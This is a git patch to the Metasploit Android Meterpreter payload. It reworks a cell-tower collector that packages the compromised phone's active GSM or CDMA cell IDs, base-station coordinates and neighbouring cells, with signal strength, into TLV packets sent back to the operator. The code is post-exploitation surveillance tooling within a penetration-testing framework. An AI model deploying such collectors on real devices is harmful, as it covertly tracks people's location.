From 3ce9cdaf1755c7ea6fd20275d718e564d08c27db Mon Sep 17 00:00:00 2001 From: HD Moore Date: Mon, 2 Nov 2015 21:52:39 -0600 Subject: [PATCH] Finish up first rework of CellCollector --- .../metasploit/meterpreter/CellCollector.java | 46 +++++++++++++++---- .../meterpreter/android/interval_collect.java | 35 +++++++++++--- 2 files changed, 66 insertions(+), 15 deletions(-) diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/CellCollector.java b/java/androidpayload/library/src/com/metasploit/meterpreter/CellCollector.java index 73dc44d0..3cbac613 100644 --- a/java/androidpayload/library/src/com/metasploit/meterpreter/CellCollector.java +++ b/java/androidpayload/library/src/com/metasploit/meterpreter/CellCollector.java @@ -230,7 +230,6 @@ public class CellCollector extends IntervalCollector { // -> Short( psc ) // -> Short( rssi ) - output.writeLong(this.timeout); output.writeInt(this.collections.size()); for (Long ts : this.collections.keySet()) { @@ -277,18 +276,47 @@ public class CellCollector extends IntervalCollector { long timestamp = ts.longValue(); CellResult result = collections.get(timestamp); - TLVPacket resultSet = new TLVPacket(); - TLVPacket CellSet = new TLVPacket(); + TLVPacket activeCell = new TLVPacket(); + TLVPacket neighbors = new TLVPacket(); + TLVPacket cellSet = new TLVPacket(); + TLVPacket resultSet = new TLVPacket(); resultSet.add(interval_collect.TLV_TYPE_COLLECT_RESULT_TIMESTAMP, timestamp / 1000); - /* - CellSet.add(interval_collect.TLV_TYPE_GEO_LAT, Double.toString(geoLoc.mLatitude)); - CellSet.add(interval_collect.TLV_TYPE_GEO_LONG, Double.toString(geoLoc.mLongitude)); - resultSet.addOverflow(interval_collect.TLV_TYPE_COLLECT_RESULT_GEO, CellSet); + switch(result.active.ptype) { + case TelephonyManager.PHONE_TYPE_GSM: + activeCell.add(interval_collect.TLV_TYPE_CELL_CID, result.active.gsm.mCid); + activeCell.add(interval_collect.TLV_TYPE_CELL_LAC, result.active.gsm.mLac); + activeCell.add(interval_collect.TLV_TYPE_CELL_PSC, result.active.gsm.mPsc); + cellSet.addOverflow(interval_collect.TLV_TYPE_CELL_ACTIVE_GSM, activeCell); + break; + + case TelephonyManager.PHONE_TYPE_CDMA: + activeCell.add(interval_collect.TLV_TYPE_CELL_BASE_ID, result.active.cdma.mBaseId); + activeCell.add(interval_collect.TLV_TYPE_CELL_BASE_LAT, result.active.cdma.mBaseLat); + activeCell.add(interval_collect.TLV_TYPE_CELL_BASE_LONG, result.active.cdma.mBaseLong); + activeCell.add(interval_collect.TLV_TYPE_CELL_NET_ID, result.active.cdma.mNetId); + activeCell.add(interval_collect.TLV_TYPE_CELL_SYSTEM_ID, result.active.cdma.mSystemId); + cellSet.addOverflow(interval_collect.TLV_TYPE_CELL_ACTIVE_CDMA, activeCell); + break; + } + + for (int i=0; i < result.neighbors.size(); i++) { + TLVPacket neighbor = new TLVPacket(); + CellNeighbor cellNeighbor = result.neighbors.get(i); + + neighbor.add(interval_collect.TLV_TYPE_CELL_NET_TYPE, cellNeighbor.mType); + neighbor.add(interval_collect.TLV_TYPE_CELL_CID, cellNeighbor.mCid); + neighbor.add(interval_collect.TLV_TYPE_CELL_LAC, cellNeighbor.mLac); + neighbor.add(interval_collect.TLV_TYPE_CELL_PSC, cellNeighbor.mPsc); + // Convert signal strength back to negative dBm on the other side + neighbor.add(interval_collect.TLV_TYPE_CELL_RSSI, Math.abs(cellNeighbor.mRssi)); + cellSet.addOverflow(interval_collect.TLV_TYPE_CELL_NEIGHBOR, neighbor); + } + + resultSet.addOverflow(interval_collect.TLV_TYPE_COLLECT_RESULT_CELL, cellSet); packet.addOverflow(interval_collect.TLV_TYPE_COLLECT_RESULT_GROUP, resultSet); - */ } } catch (IOException ex) { @@ -299,3 +327,5 @@ public class CellCollector extends IntervalCollector { } } + + diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/interval_collect.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/interval_collect.java index 845197e1..8ffd3794 100644 --- a/java/androidpayload/library/src/com/metasploit/meterpreter/android/interval_collect.java +++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/interval_collect.java @@ -49,17 +49,38 @@ public class interval_collect implements Command { // TLVs for Cell public static final int TLV_TYPE_COLLECT_RESULT_CELL = TLVPacket.TLV_META_TYPE_GROUP - | (TLV_EXTENSIONS + 9040); - public static final int TLV_TYPE_CELL_TYPE = TLVPacket.TLV_META_TYPE_STRING - | (TLV_EXTENSIONS + 9041); + | (TLV_EXTENSIONS + 9060); + public static final int TLV_TYPE_CELL_ACTIVE_GSM = TLVPacket.TLV_META_TYPE_GROUP + | (TLV_EXTENSIONS + 9061); + public static final int TLV_TYPE_CELL_ACTIVE_CDMA = TLVPacket.TLV_META_TYPE_GROUP + | (TLV_EXTENSIONS + 9062); + public static final int TLV_TYPE_CELL_NEIGHBOR = TLVPacket.TLV_META_TYPE_GROUP + | (TLV_EXTENSIONS + 9063); + + // TLVs for Cell Neighbors + public static final int TLV_TYPE_CELL_NET_TYPE = TLVPacket.TLV_META_TYPE_UINT + | (TLV_EXTENSIONS + 9065); public static final int TLV_TYPE_CELL_CID = TLVPacket.TLV_META_TYPE_UINT - | (TLV_EXTENSIONS + 9042); + | (TLV_EXTENSIONS + 9066); public static final int TLV_TYPE_CELL_LAC = TLVPacket.TLV_META_TYPE_UINT - | (TLV_EXTENSIONS + 9043); + | (TLV_EXTENSIONS + 9067); public static final int TLV_TYPE_CELL_PSC = TLVPacket.TLV_META_TYPE_UINT - | (TLV_EXTENSIONS + 9044); + | (TLV_EXTENSIONS + 9068); public static final int TLV_TYPE_CELL_RSSI = TLVPacket.TLV_META_TYPE_UINT - | (TLV_EXTENSIONS + 9045); + | (TLV_EXTENSIONS + 9069); + + // TLVs for CDMA networks + public static final int TLV_TYPE_CELL_BASE_ID = TLVPacket.TLV_META_TYPE_UINT + | (TLV_EXTENSIONS + 9070); + public static final int TLV_TYPE_CELL_BASE_LAT = TLVPacket.TLV_META_TYPE_UINT + | (TLV_EXTENSIONS + 9071); + public static final int TLV_TYPE_CELL_BASE_LONG = TLVPacket.TLV_META_TYPE_UINT + | (TLV_EXTENSIONS + 9072); + public static final int TLV_TYPE_CELL_NET_ID = TLVPacket.TLV_META_TYPE_UINT + | (TLV_EXTENSIONS + 9073); + public static final int TLV_TYPE_CELL_SYSTEM_ID = TLVPacket.TLV_META_TYPE_UINT + | (TLV_EXTENSIONS + 9074); + @Override public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {